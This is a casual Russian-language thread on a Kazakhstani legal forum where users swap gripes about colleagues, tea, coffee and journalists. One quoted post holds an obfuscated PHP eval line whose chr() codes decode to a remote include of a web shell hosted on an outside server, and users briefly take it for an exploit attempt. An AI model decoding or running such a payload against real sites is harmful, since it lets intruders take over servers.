Перейти к контенту
КАЗАХСТАНСКИЙ ЮРИДИЧЕСКИЙ ФОРУМ

Рекомендуемые сообщения

Опубликовано

T. Rash писал(а):

С утра такой негатив!? :umnik: Смотрите какая погода за окном, вспомните, что седня пятница!

Будте терпимее. :biggrin:

Весна!

post-6771-1141964049.gif

• Ответы 141
  • Created
  • Последний ответ

Top Posters In This Topic

Опубликовано

Als Fess писал(а):

А им это удобно. Партачят бухгалтеры, ... Надо жестко работать с ВСЕМИ исполнителями (включая бухгалтерию). Гонять, втыкать, расстреливать, писать служебки руководству, выявлять все малейшие недостатки. Наказания, штрафы. Вот так их ...

Als, помилуйте, зачем так жестоко… Да еще с элементами собственного превосходства и подставы. Почему нельзя просто работать вместе на благо процветания фирмы, где каждый выполняет свои должностные обязанности? :biggrin:
Опубликовано

Андрэ писал(а):

Als, помилуйте, зачем так жестоко… Да еще с элементами собственного превосходства и подставы.

Господь меня спаси. :biggrin: По собственному превосходству (расизму, шовинизму и др.измам) - это вообще не ко мне, а к Адольфу... Гитлеру. А упоминаемая ситуация (ответственность юр.отдела за партаки бухгалтерии (как и других отделов)) не подстава (со стороны бухгалтерии или др.отделов), а осуществление трудовых обязанностей. Отвечать за предприятие в судах и др.гос.органах и т.д. все равно юристы будут - это вполне пормально.

Андрэ писал(а):

Почему нельзя просто работать вместе на благо процветания фирмы, где каждый выполняет свои должностные обязанности? :horn:

Работаем... вместе... :umnik: Без бухгалтерии предприятию вообще никуда.

п.с. Вопрос не по теме. Кстати, почему на всех предприятиях бухгалтерия ежечасно пьет чай? :umnik: Как его можно целый день пить. :horn: (наши раз 10 в день пьют).

Опубликовано

:biggrin:

Чай, к сожалению, искоренить невозможно. Я пробовал - не получается. Это профессиональное и необходимое. Как посещение курилки.

Опубликовано

Дааа, насчет бухгалтерии это истинная правда.... :umnik:

ООО чень редко встречаются стройные бухгалтера.......

А меня бесит, когда какой-нибудь исполнитель пытается учить тебя как работать.. :horn: Постоянная борьба с ними :umnik:

Быстрей бы им заключить договор - и все по фигу, а потом какие будут последствия - абсолютно все равно!!!! :biggrin:

Опубликовано

Ребята, давайте жить дружно! :umnik:

Не понимаю, почему кто-то кого-то должен ненавидеть?! :umnik:

Вот нас, журналистов, ненавидят люди всех тех специальностей, которые вы перечисляли выше. Ох люто ненавидят нас чиновники любого министерства, департамента, агентства или комитета. :biggrin:

Собственно и вы, господа юристы, нас не долюбливаете, что уже кривить душой.

Я бы тоже могла написать огромный список тех, кого по идее должна ненавидеть. Но... Приходиться всех любить, ведь только любовь и ласка могут пробить черствое сердце госслужащего. С улыбкой надо ко всему подходить, с улыбкой! :horn:

А вот ненавижу я тупость человеческую, но ведь людей, наделенных ею, можно встретить в любой профессии. Министры бывают тупыми и сантехники. Тут уж ничего не поделаешь.

Опубликовано

ru_kz писал(а):

Дааа, насчет бухгалтерии это истинная правда.... :horn:

ООО чень редко встречаются стройные бухгалтера.......

А меня бесит, когда какой-нибудь исполнитель пытается учить тебя как работать.. :horn: Постоянная борьба с ними :umnik:

Быстрей бы им заключить договор - и все по фигу, а потом какие будут последствия - абсолютно все равно!!!! :umnik:

Моя мама бухгалтер...и она стройная...а чай пьет только за обедом... :biggrin:

Опубликовано

Ulya писал(а):

а как вам просьба - "помогите нам юридически подшить договор"? :biggrin:

не, лучше вопрос: - Как это по-юридически правильно 8)

Опубликовано

G_page писал(а):

Моя мама бухгалтер...и она стройная...а чай пьет только за обедом... :biggrin:

Уважаемая, G_page, не обижайтесь, практика показывает в "в каждом правиле есть исключения"

п.с.: я же не сказала, что все....я сказала ОООчень редко, соответственно все таки встречаются!!

Опубликовано (изменено)

Anhen писал(а):

Ребята, давайте жить дружно! :umnik:

Не понимаю, почему кто-то кого-то должен ненавидеть?! :horn:

Вопрос вообще был "это" или "что то" ненавижу (лучше было вообще сказать "раздражает" или "не нравится"). То бишь говорим о ситуацих \ поведении\ погоду и т.д., а не конкретных профессиях и т.д.

Журналистика вообще профессия родственная юристам. Правовое государство и демократия может существовать только при сильных СМИ и качественной правовой культуре.

А споры чья профессия важнее и нужна - это из басни "что важнее, рука или нога".

п.с. Чай на работе вообще не пью. Принципиально. :biggrin: :umnik:

Изменено пользователем Als Fess
Опубликовано

ar4 писал(а):

не, лучше вопрос: - Как это по-юридически правильно 8)

А как Вам это: "А как это будет с точки зрения юриспруденции?"

Гость СЧАСТЬЕ_И_УДАЧА
Опубликовано

Anhen писал(а):

Ребята, давайте жить дружно! :suspect:

Не понимаю, почему кто-то кого-то должен ненавидеть?! :biggrin:

Вот нас, журналистов, ненавидят люди всех тех специальностей, которые вы перечисляли выше. Ох люто ненавидят нас чиновники любого министерства, департамента, агентства или комитета. :bow:

Собственно и вы, господа юристы, нас не долюбливаете, что уже кривить душой.

Я бы тоже могла написать огромный список тех, кого по идее должна ненавидеть. Но... Приходиться всех любить, ведь только любовь и ласка могут пробить черствое сердце госслужащего. С улыбкой надо ко всему подходить, с улыбкой! :hb:

А вот ненавижу я тупость человеческую, но ведь людей, наделенных ею, можно встретить в любой профессии. Министры бывают тупыми и сантехники. Тут уж ничего не поделаешь.

Среди министров тупых все таки меньше - хотя наверное нечестных больше

И вообще тема то называется "а это ненавижу", а не "а этих ненавижу"

не то чтобы ненавижу, скорее не люблю когда "не в тему"

хотя себе конечно все прощаю

Опубликовано

Андрэ писал(а):

Als, помилуйте, зачем так жестоко… Да еще с элементами собственного превосходства и подставы. Почему нельзя просто работать вместе на благо процветания фирмы, где каждый выполняет свои должностные обязанности? :biggrin:

Да, верно, командный подход или мозговой штурм (как хотите) помогает решить многие проблемы или задачи.

НЕ нравится, когда кто-нить выделывается. Особенно, при отсутствии соображения... :suspect:

• 4 weeks later...
Опубликовано

Андрэ писал(а):

:druzja:

Чай, к сожалению, искоренить невозможно. Я пробовал - не получается. Это профессиональное и необходимое. Как посещение курилки.

Андрэ, хочу с вами поделиться, и не только бухгалтера любят чаепитие, но и юристы, причем многие, страдают этим милым пороком тоже. Я тоже не исключение, а скорее правило - большая любительница кофе и пью его на работе беспрестанно, но, чтобы не вызывать праведный гнев со стороны сослуживцев, использую некоторые хитрости: диспенсер гостит от меня в двух шагах, кофе не натуральный (натуральный требует определенных временных затрат и наличия кофеварки), а растворимый – «Картье», вполне приличный вкус. И получается, когда я хочу кофе, я делаю это не отрываясь так сказать, от производственного процесса - глядя в монитор и не прерывая мыслительного процесса. При этом необходимо соблюдать два правила: первое - помнить, куда поставил кружку, чтобы не залить важные бумаги и самое главное не вовлекать в этот процесс коллег, ну а если все же кто-то составил вам компанию, не развивать спорные темы или темы, требующие длительных рассуждений, не касающиеся работы, т.е. делать это максимально быстро.

Опубликовано (изменено)

Сакура писал(а):

диспенсер гостит от меня в двух шагах, кофе не натуральный (натуральный требует определенных временных затрат и наличия кофеварки), а растворимый – «Картье», вполне приличный вкус.

Сакура как всегда не упустит случая похвалить и создать рекламу блюду :leb::druzja::leb:

Сразу чувтсвуется хозяйка Грибоедова. :leb:

А если серьезно то в каждой профессии есть косяки. :leb:

Это уже от человека а не от професии.

Не люблю когда чей то косят пытаются в наглую повесить на тебя, когда все белыми нитками. :leb:

Изменено пользователем M9300
Опубликовано

M9300 писал(а):

Сакура как всегда не упустит случая похвалить и создать рекламу блюду :leb::druzja::leb:

Мансур!

Спасибо за комплимент… :leb:

То, что в моих постах звучит возможно как реклама, носит исключительно рекомендательный характер, продиктованный личным вкусом… в данном случае трудно найти достойную замену натуральному кофе, изжаренному, смолотому и сваренному тобой. Я смею заверить, что мной были перепробованы почти все марки растворимого кофе, всевозможных производителей…

Таким образом, эта марка кофе меня вполне устраивает, так же и по той причине, что отправным сырьем является арабика, но при этом надо учитывать так же тот факт, что у каждого вкус индивидуален… :leb:

Опубликовано (изменено)

Сакура писал(а):

Мансур!

Спасибо за комплимент… :druzja:

То, что в моих постах звучит возможно как реклама, носит исключительно рекомендательный характер, продиктованный личным вкусом… в данном случае трудно найти достойную замену натуральному кофе, изжаренному, смолотому и сваренному тобой. Я смею заверить, что мной были перепробованы почти все марки растворимого кофе, всевозможных производителей…

Таким образом, эта марка кофе меня вполне устраивает, так же и по той причине, что отправным сырьем является арабика, но при этом надо учитывать так же тот факт, что у каждого вкус индивидуален… :leb:

Все равно спасибо,сорри, имя не знаю :leb:

Но у меня есть возможность пить натуральный в буфете.

Не примену случаем и попробую по Вашей рекомендации. Спасибо :leb:

У нас в настоящее время Картье нет в буфете.

Не помню названия натурального кофе кажется "Illy"

Изменено пользователем M9300
  • 2 weeks later...
Опубликовано

sweety писал(а):

<font color='#F660AB'>..я ненавижу рано утром новость об отсутствии горячей воды :lol:</font>

Ладно бы ещё горячей, а вот когда и холодной нет.... :biggrin:

Опубликовано

Цитата
Вот нас, журналистов, ненавидят люди всех тех специальностей, которые вы перечисляли выше. Ох люто ненавидят нас чиновники любого министерства, департамента, агентства или комитета.

скорее не ненавидят а недолюбливают :lol:

спрашиваеться за что?

а за то-что когда журналистам говоришь одно, они печтатают так как они захотят :biggrin:

любимая фраза для журналистов- без комментариев :lol:

Гость Фаркаш
Опубликовано

Pro писал(а):

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

человечек пытался эксплоитом форум завалить?

• 3 years later...
Опубликовано

Фаркаш писал(а):
человечек пытался эксплоитом форум завалить?

эт как в анекдоте "у меня скорость печатания - тысяча знаков в минуту, правда... такая фигня получается!"

Опубликовано

Anюta_N писал(а):
Не навижу предательства от друзей....

Ну тогда это не друзья... у меня нет друзей... вообще... только знакомые. И предать могут все, даже Вы, даж я, даже все... в определенных обстоятельствах.

• Недавно просматривали   0 пользователей

• Ни один зарегистрированный пользователь не просматривает эту страницу.
  • Upcoming Events

No upcoming events found
  • Recent Event Reviews

Важная информация

Правила форума Условия использования